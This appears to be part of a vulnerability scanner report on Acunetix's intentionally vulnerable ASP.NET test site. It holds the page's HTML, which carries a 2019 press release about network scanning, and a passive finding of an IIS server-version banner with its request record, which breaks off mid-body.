value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC/V3VUyYDVyDam3PHmHmEHBfQA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGZvvLHX89VirHfgZv59zKO75WKS" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Method	POST
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 422 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 Content-Length: 10937 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 10,937 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBh